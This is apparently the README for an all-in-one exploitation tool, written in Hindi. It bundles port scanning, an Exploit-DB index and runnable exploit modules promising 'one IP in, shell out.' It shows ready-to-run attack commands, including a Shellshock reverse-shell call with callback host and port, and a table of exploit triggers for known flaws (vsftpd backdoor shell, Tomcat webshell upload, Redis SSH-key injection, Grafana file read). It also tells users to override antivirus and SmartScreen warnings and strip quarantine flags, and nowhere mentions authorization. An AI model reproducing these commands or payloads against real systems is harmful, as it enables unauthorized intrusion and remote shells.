एक ही बाइनरी जो एक पोर्ट स्कैनर, पूर्ण Exploit-DB इंडेक्स (47k प्रविष्टियाँ) और चलाने योग्य एक्सप्लॉइट मॉड्यूल को एक टूल में समाहित करती है। Rust में लिखा गया, Linux, Windows और macOS पर चलता है।
स्कैन, मैच, एक्सप्लॉइट — एक IP अंदर, शेल बाहर।
एक ही बाइनरी जो पोर्ट स्कैनर, पूरे Exploit-DB इंडेक्स, और रन करने योग्य एक्सप्लॉइट मॉड्यूल्स के सेट को एक टूल में समेटती है। Linux, Windows और macOS पर चलती है।
| काम | आम तौर पर | यहाँ |
|---|---|---|
| होस्ट पर सर्विस ढूँढना | nmap | UltraSploiter scan <ip> |
| एक्सप्लॉइट खोजना | searchsploit | UltraSploiter search <kw> |
| उन्हें चलाना | msfconsole | UltraSploiter exploit <ip> <module> |

सबसे आसान और सबसे अच्छा तरीका है कि तैयार बाइनरी डाउनलोड करके चला दें। कुछ भी इंस्टॉल करने की ज़रूरत नहीं, कोई डिपेंडेंसी नहीं — एक ही सेल्फ-कंटेन्ड फ़ाइल।
Releases पेज से डाउनलोड करें:
UltraSploiter-windows-x86_64.exe → डबल-क्लिक करेंUltraSploiter-linux-x86_64ध्यान दें: सिक्योरिटी टूल्स फ़्लैग हो जाते हैं। Windows SmartScreen और एंटीवायरस संभवतः बाइनरी को चेतावनी देंगे या क्वारंटीन कर देंगे — More info → Run anyway पर क्लिक करें, या अगर इसे रखना है तो एक्सक्लूज़न जोड़ें।
UltraSploiter.exe पर डबल-क्लिक करें। मेन्यू खुल जाएगा।
अगर SmartScreen अज्ञात पब्लिशर की चेतावनी दे (किसी भी अनसाइन्ड बाइनरी के लिए देगा), तो More info → Run anyway पर क्लिक करें।
chmod +x UltraSploiter-linux-x86_64
./UltraSploiter-linux-x86_64
chmod +x UltraSploiter-macos-arm64
./UltraSploiter-macos-arm64
अगर Gatekeeper इसे ब्लॉक करे (फिर से, कोई भी अनसाइन्ड बाइनरी), तो या तो राइट-क्लिक → Open, या एक बार क्वारंटीन फ़्लैग हटा दें:
xattr -d com.apple.quarantine UltraSploiter-macos-arm64
सिर्फ़ तब ज़रूरी है जब आपके प्लेटफ़ॉर्म के लिए कोई बाइनरी न हो, या आप इसमें बदलाव करना चाहते हों। Rust 1.74+ आवश्यक है।
sudo apt install build-essential # gcc + linker (Debian/Ubuntu)
git clone https://gitlab.com/vqkro/ultrasploiter
cd ultrasploiter
./build.sh # -> ./UltraSploiter
xcode-select --install # clang + linker
git clone https://gitlab.com/vqkro/ultrasploiter
cd ultrasploiter
./build.sh # -> ./UltraSploiter
git clone https://gitlab.com/vqkro/ultrasploiter
cd ultrasploiter
.\build.ps1 # -> UltraSploiter.exe
build.ps1 stable-x86_64-pc-windows-gnu टूलचेन का उपयोग करता है, जो MinGW से लिंक होता है —
इसलिए आपको Visual Studio या MSVC की ज़रूरत नहीं। अगर वह टूलचेन मौजूद न हो तो यह उसे इंस्टॉल कर देता है।
अगर आपके पास पहले से MSVC Build Tools हैं, तो सादा cargo build --release भी काम करेगा।
Windows + GNU ध्यान दें:
windows-sys(जिसे tokio खींचता है)dlltoolको कॉल करता है, जो असेंबलरasको शेल आउट करता है — और rust-mingw कंपोनेंटasनहीं देता।build.ps1%~dp0tools\mingw64\binऔर%USERPROFILE%\tools\mingw64\binमें ऐसा MinGW bin ढूँढता है जिसमें यह मौजूद हो, और मिलने पर उसेPATHमें आगे जोड़ देता है। अगरerror calling dlltoolआए तो वहाँ winlibs बिल्ड रखें। MSVC टूलचेन प्रभावित नहीं होते।
बिना किसी आर्ग्युमेंट के आपको मेन्यू मिलता है:
1) Scan a target find open ports and services
2) Search exploits keyword lookup
3) List runnable modules
4) Run an exploit pick a target and a module
5) Console advanced msf-style commands
0) Exit
UltraSploiter scan 10.0.0.5 # top 1000 ports + fingerprint + suggestions
UltraSploiter scan 10.0.0.5 -p 1-1024 -T4 # range, fast timing
UltraSploiter scan 10.0.0.5 -p - # all 65535 ports
UltraSploiter scan 10.0.0.5 -sU # UDP scan
UltraSploiter scan 10.0.0.5 --json
UltraSploiter scan 10.0.0.5 -oX out.xml
UltraSploiter search samba
UltraSploiter info 17491
UltraSploiter show 17491 # print the PoC source for an Exploit-DB id
UltraSploiter modules
UltraSploiter msf search smb # bridge to Metasploit (needs it installed)
UltraSploiter exploit 10.0.0.5 vsftpd_234
UltraSploiter exploit 10.0.0.5 shellshock -o lhost=10.0.0.1 -o lport=4444
UltraSploiter console
Linux/macOS पर, ./ लगाएँ (जैसे ./UltraSploiter scan 10.0.0.5)।
| फ़्लैग | अर्थ |
|---|---|
-p <spec> | top (1000), 80,443, 1-1024, - (सभी) |
-T0..-T5 | टाइमिंग टेम्पलेट — धीमा/शांत से तेज़/शोरगुल तक |
-sU | UDP प्रोब स्कैन |
-sV | सर्विस/वर्ज़न डिटेक्शन (डिफ़ॉल्ट रूप से चालू) |
--no-banner | बैनर ग्रैबिंग छोड़ें |
--json | stdout पर JSON |
-oX <file> | nmap-शैली XML |
स्कैनर असिंक्रोनस (tokio) है: प्रत्येक -T लेवल तय करता है कि एक बार में कितने सॉकेट इन-फ़्लाइट होंगे
(-T5 पर 8000 तक), इसलिए यह nmap top-1000 को कुछ सेकंड में कवर कर लेता है। हर "open" एक पूर्ण TCP हैंडशेक है,
इसलिए परिणाम सटीक होते हैं।
-o key=value)| key | किसके द्वारा उपयोग | अर्थ |
|---|---|---|
lhost, lport | rev-shell मॉड्यूल | कॉलबैक पता |
rport | web मॉड्यूल | HTTP पोर्ट ओवरराइड करें |
path | shellshock, struts, phpunit | एंडपॉइंट पथ |
user, pass | tomcat_manager | मैनेजर क्रेडेंशियल |
core | solr_rce | Solr core नाम |
file | grafana_lfi | पढ़ने के लिए फ़ाइल |
ssh_pubkey | redis_unauth | authorized_keys में डालने के लिए key |
src, dst | proftpd_modcopy | सोर्स / डेस्टिनेशन कॉपी करें |
timeout | सभी | सॉकेट टाइमआउट सेकंड |
search और info पूरे Exploit-DB इंडेक्स — 47,000+ एंट्रीज़ (वही डेटासेट जो searchsploit उपयोग करता है)
पर आधारित हैं, जो बाइनरी में बंडल है। जब किसी एंट्री में ऐसा CVE हो जिसे कोई रन करने योग्य मॉड्यूल लागू करता है,
तो info दोनों को लिंक कर देता है:
$ UltraSploiter info 17491
Exploit-DB 17491
description vsftpd 2.3.4 - Backdoor Command Execution (Metasploit)
codes OSVDB-73573;CVE-2011-2523
[runnable] vsftpd_234
UltraSploiter exploit <ip> vsftpd_234
| मॉड्यूल | CVE | ट्रिगर |
|---|---|---|
vsftpd_234 | CVE-2011-2523 | :) यूज़रनेम → 6200 पर root bind shell |
unrealircd_backdoor | CVE-2010-2075 | IRC पर AB; <cmd> |
distcc_exec | CVE-2004-2687 | DIST प्रोटोकॉल कंपाइलर आर्ग्युमेंट |
proftpd_modcopy | CVE-2015-3306 | SITE CPFR/CPTO फ़ाइल कॉपी |
redis_unauth | — | CONFIG SET एक key या cron एंट्री लिखता है |
shellshock | CVE-2014-6271 | User-Agent: () { :; }; <cmd> |
struts2_5638 | CVE-2017-5638 | Content-Type में OGNL |
tomcat_put | CVE-2017-12615 | एक JSP webshell PUT करें |
tomcat_manager | — | /manager के ज़रिए WAR डिप्लॉय करें |
elasticsearch_groovy | CVE-2015-1427 | _search में Groovy RCE |
drupalgeddon2 | CVE-2018-7600 | Form API render callback |
phpunit_eval | CVE-2017-9841 | eval-stdin.php |
jenkins_script | CVE-2019-1003000 | अनऑथेंटिकेटेड /script Groovy |
solr_rce | CVE-2019-17558 | stream.body में Velocity टेम्पलेट |
grafana_lfi | CVE-2021-43798 | प्लगइन पाथ ट्रैवर्सल फ़ाइल रीड |
webmin_backdoor | CVE-2019-15107 | password_change.cgi एक वैल्यू को शेल में पाइप करता है |
php_cgi_arg_injection | CVE-2012-1823 | क्वेरी स्ट्रिंग के ज़रिए -d auto_prepend_file |
प्रत्येक एक नॉन-डिस्ट्रक्टिव check() और एक run() लागू करता है।
ये छोटे JSON रेसिपी हैं जिन्हें data/catalog.json में कैटलॉग इंजन चलाता है।
एक मॉड्यूल जोड़ना ~8 लाइन का डेटा है, नई सोर्स फ़ाइल नहीं: